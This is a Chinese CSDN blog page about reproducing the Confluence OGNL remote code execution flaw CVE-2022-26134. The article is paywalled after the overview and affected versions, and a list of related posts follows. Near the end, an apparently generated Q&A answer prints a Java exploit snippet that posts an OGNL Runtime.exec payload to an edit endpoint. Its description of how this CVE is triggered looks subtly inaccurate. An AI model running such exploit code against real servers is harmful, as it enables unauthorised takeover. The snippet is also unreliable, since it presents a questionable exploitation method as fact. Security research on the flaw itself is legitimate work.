【漏洞复现】Atlassian Confluence(CVE-2022-26134)OGNL远程代码执行

已于 2022-06-06 10:20:52 修改
阅读量2.4k 收藏 7
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: Confluence
于 2022-06-06 10:18:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46944519/article/details/125141253

文章目录

声明

本篇文章所涉及技术与工具仅用于技术研究、漏洞复现,切勿用于非法渗透攻击行为,造成任何后果与本作者无关,切记!!!

一、漏洞概述

Atlassian Confluence 是一款各企业广泛使用的 wiki 系统。在Atlassian Confluence Server and Data Center上存在OGNL 注入漏洞,恶意攻击者可以利用该漏洞在目标Atlassian Confluence Server and Data Center服务器上注入恶意ONGL表达式 ,造成远程执行代码并部署WebShell

二、漏洞说明

组件名称:Atlassian Confluence Server and Data Center
漏洞类型:远程代码执行
利用条件:

  • 用户认证:不需要用户认证
  • 前置条件:默认配置
  • 触发方式:远程

三、漏洞版本

1.3.0 <= Confluence Server and Data Center < 7.4.17

7.13.0 <= Confl
了解本专栏 订阅专栏 解锁全文 超级会员免费看
1、深入探索 Atlassian Confluence 5:搭建企业级协作平台
v5w6x的博客
06-27 68
本文深入探讨了 Atlassian Confluence 5 的核心功能与实际应用,涵盖了从安装部署、用户管理、内容创建与管理,到协作功能、安全保障、定制化、插件扩展以及与其他工具的集成。通过详细的步骤说明和案例分析,帮助企业和团队更好地理解如何利用 Confluence 搭建高效的协作平台,并展望其未来的发展趋势。
Atlassian Confluence CVE-2022-26134 RCE漏洞
4SecNet团队专栏
04-22 1403
漏洞环境搭建前期主要搭建动态调试环境,但是一直失败(这里主要记录下动态调试环境搭建过程,待之后再碰到类似的问题,希望能够解决)通常称为服务端小程序,是服务端的程序,用于处理及响应客户的请求。之后即可直接调试(这次是成功了的,可以正常动态调试,反思和之前不一样的操作就是在弹出。直接对比补丁包的修改,入手点参考网上已有的分析报告.主要参考链接在文末给出.填入密钥,因为我这里已经注册过了,所以直接填入密钥,没注册过,可以点击。的环境基本上已经搭建完毕了,接下来进行网站设置,我选择的是。(直接进行动态调试)
【成功复现Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527)
wuli1024的博客
01-25 1654
Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。
Atlassian Confluence 远程代码执行 CVE-2022-26134漏洞复现
m0_60635609的博客
04-07 1082
Atlassian ConfluenceAtlassian公司出品的专业wiki程序。攻击者可利用漏洞在未经身份验证的情况下,远程构造OGNL表达式进行注入,在Confluence Server或Data Center上执行任意代码。请相关用户尽快自检并采取措施进行防护。(Confluence还有个RCE,为了好区分,我习惯把是CVE-2021-26084这个叫OGNL表达式注入命令执行漏洞,在后续的文章,我也会复现CVE-2021-26084)
Atlassian Confluence 远程代码执行漏洞分析(CVE-2023-22518)
hackzkaq的博客
11-09 1236
由于漏洞易于利用且具有严重破坏性(导致数据丢失), 因此本文章中不会公开该漏洞的利用程序. 感兴趣的读者, 可以按照文章中的思路来复现漏洞. 请注意, 本文仅供学习目的使用.
Atlassian Confluence 远程代码执行漏洞CVE-2022-26134复现
热门推荐
weixin_42489549的博客
06-29 1万+
CVE-2022-26134 Confluence远程命令执行漏洞复现
Atlassian Confluence远程代码执行漏洞CVE-2022-26134
tpaer的博客
12-09 1811
之前看到过Confluence这个洞没太在意以为没什么人用,结果在自己公司遇到了,简单复现一下。
Atlassian Confluence 远程代码执行漏洞CVE-2022-26134漏洞分析与防护
不忘初心,护天下安全!
06-24 1087
Confluence是一款专业的企业知识管理与协同软件,常用于企业wiki的构建,支持团队成员间开展信息共享、文档协作、集体讨论和信息推送等工作,具有较为便捷的编辑和站点管理特性。该软件由Atlassian公司负责开发和维护。2022年6月3日,国家信息安全漏洞共享平台(CNVD)收录了Confluence远程代码执行漏洞(CNVD-2022-43094,对应CVE-2022-26134)。在Atlassian Confluence Server and Data Center上存在OGNL注入漏洞,恶意攻
Confluence OGNL表达式注入漏洞复现与分析(CVE-2022-26134
Brucetg的博客
06-06 5071
在受影响的 Confluence Server 和 Data Center 版本中,存在一个 OGNL 注入漏洞,该漏洞允许未经身份验证的攻击者在 Confluence Server 或 Data Center 实例上执行任意代码。
Atlassian Confluence 远程代码执行漏洞CVE-2022-26134漏洞复现
网安君的博客
06-07 3606
本文章仅供学习和研究使用,严禁使用该文章内容对互联网其他应用进行非法操作,若将其用于非法目的,所造成的后果由您自行承担,产生的一切风险与本文作者无关,如继续阅读该文章即表明您默认遵守该内容。CVE-2022-26134漏洞是一个严重的未经身份验证的远程代码执行漏洞,通过 OGNL 注入利用并影响 1.3.0 版之后的所有 Atlassian Confluence 和 Data Center 2016 服务器。成功利用允许未经身份验证的远程攻击者创建新的管理员帐户、执行命令并最终接管服务器。1.3.0 ..
ATLASSIAN CONFLUENCE 远程代码执行漏洞CVE-2022-26134漏洞复现
Websec
06-07 1421
近日,Atlassian官方发布了Confluence Server和Data Center OGNL 注入漏洞CVE-2022-26134)的安全公告,远程攻击者在未经身份验证的情况下,可构造OGNL表达式进行注入,实现在Confluence Server或Data Center上执行任意代码,CVSS评分为10。目前该漏洞细节与PoC已被公开披露,且被检测到存在在野利用。请相关用户尽快采取措施进行防护。Atlassian ConfluenceAtlassian公司出品的专业wiki程序。它可以作为一
Atlassian Confluence 远程代码执行漏洞CVE-2022-26134)风险通告及POC复现
qq_18209847的博客
06-07 3278
信息安全部监测到Atlassian Confluence Server and Data Center (CVE-2022-26134远程代码执行漏洞
CVE -2022-26134漏洞复现(Confluence OGNL 注入rce漏洞)
qq_17754023的博客
06-04 5573
Atlassian ConfluenceAtlassian Confluence是一个专业的企业知识管理与协同软件,主要用于公司内员工创建知识库并建立知识管理流程,也可以用于构建企业wiki。其使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。因此,该系统被国内较多知名互联网企业所采用,应用范围较广,因此该漏洞威胁影响范围较大。 0x02 漏洞概述Atlassian Confluence存在远程代码执行漏洞,攻击者可以利用该漏洞直接获取目标系统权限。...
Atlassian Confluence_远程代码执行(CVE-2022-26134)
Blue的博客
06-06 1717
Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。Confluence Server 和 Data Center 存在OGNL 注入漏洞,该漏洞源于Confluence,xwork-1.0.3-atlassian-8.jar 对 OGNL 表达式过滤不严谨,导致存在 OGNL 表达式注入漏洞,攻击者可以通过构造发送特定HTTP请求利用此漏洞。成功利用后可对 Confluence
漏洞复现Atlassian Confluence RCE(CVE-2023-22527)
zkaqlaoniao的博客
06-26 744
Atlassian Confluence 是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。是面向大型企业和组织的高可用性、可扩展性和高性能版本。Atlassian Confluence /template/aui/text-inline.vm接口处存在velocity模板注入,未经身份验证的攻击者可利用此漏洞构造恶意请求远程代码执行,可导致服务器失陷。
企业知识管理与协同软件系统Atlassian Confluence 远程代码执行漏洞
weixin_68647219的博客
08-01 3573
Atlassian Confluence 远程代码执行漏洞高危漏洞,该漏洞是由于上传功能的异常处理函数没有正确处理用户输入的错误信息,导致远程攻击者可通过修改HTTP请求头中的Content-Type值所造成的可能导致远程攻击者构造发送恶意的数据包,利用该漏洞进而在受影响服务器上执行任意系统命令。
Atlassian Confluence Server 远程代码执行漏洞
最新发布
m0_73399576的博客
07-21 957
知识面,决定看到的攻击面有多广。知识链,决定发动的杀伤链有多深。
CVE-2022-26134 Confluence OGNL表达式注入命令执行漏洞复现
热爱学习,喜欢折腾!
10-09 2299
Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。2022年06月04日,发现Atlassian官方发布了Confluence OGNL 注入漏洞的风险通告,漏洞编号为CVE-2022-26134漏洞等级:严重,漏洞评分:9.8。目前该漏洞安全补丁已发布,漏洞细节已公开,POC已公开。
漏洞复现CVE-2022-26134 Atlassian Confluence_远程代码执行
m0_53121608的博客
07-13 280
漏洞复现CVE-2022-26134 Atlassian Confluence_远程代码执行
java.exe -jar CVE-2022-26134.jar 是哪个渗透工具的代码
06-26
CVE-2022-26134 是一个与 Atlassian Confluence 相关的远程代码执行(RCE)漏洞。攻击者可以利用该漏洞在受影响的 Confluence 服务器上执行任意代码。为了利用此漏洞,安全研究人员和渗透测试人员开发了相关的漏洞利用工具。 命令 `java.exe -jar CVE-2022-26134.jar` 通常用于运行一个基于 Java 编写的漏洞利用工具,该工具通过命令行调用 JAR 文件来实现对目标系统的攻击。此类工具通常包含恶意负载(payload),并通过构造特定的 HTTP 请求触发 ConfluenceOGNL 解析漏洞,从而实现远程代码执行。 这类工具的具体实现可能来源于 GitHub 上公开的漏洞 PoC 或 Exploit 模板[^1],其核心逻辑包括: - 发送构造的 HTTP 请求以触发 OGNL 注入。 - 在请求参数中嵌入恶意表达式,例如 `${@java.lang.Runtime.getRuntime().exec(...)}`。 - 利用 Confluence 的某些接口未正确过滤用户输入的问题,绕过限制并执行任意命令。 以下是一个简化版的 Java 示例代码片段,展示了如何使用 `HttpURLConnection` 构造请求来尝试利用该漏洞: ```java import java.io.*; import java.net.*; public class CVE202226134Exploit { public static void main(String[] args) throws Exception { String target = "http://example.com"; String payload = "${@java.lang.Runtime.getRuntime().exec('calc')}"; URL url = new URL(target + "/pages/doeditpage.action"); HttpURLConnection conn = (HttpURLConnection) url.openConnection(); conn.setRequestMethod("POST"); conn.setDoOutput(true); conn.setRequestProperty("Content-Type", "application/x-www-form-urlencoded"); String postData = "content=" + payload; OutputStreamWriter writer = new OutputStreamWriter(conn.getOutputStream()); writer.write(postData); writer.flush(); BufferedReader in = new BufferedReader(new InputStreamReader(conn.getInputStream())); String line; while ((line = in.readLine()) != null) { System.out.println(line); } writer.close(); in.close(); } } ``` 此类工具的使用通常需要满足以下条件: - 目标系统运行的是存在漏洞Confluence 版本。 - 攻击者能够访问目标的 `/pages/doeditpage.action` 接口。 - 目标系统未打补丁或未配置适当的安全防护措施。 需要注意的是,这些工具主要用于渗透测试和安全研究目的。未经授权地对非授权系统进行测试是非法行为。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李火火安全阁

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值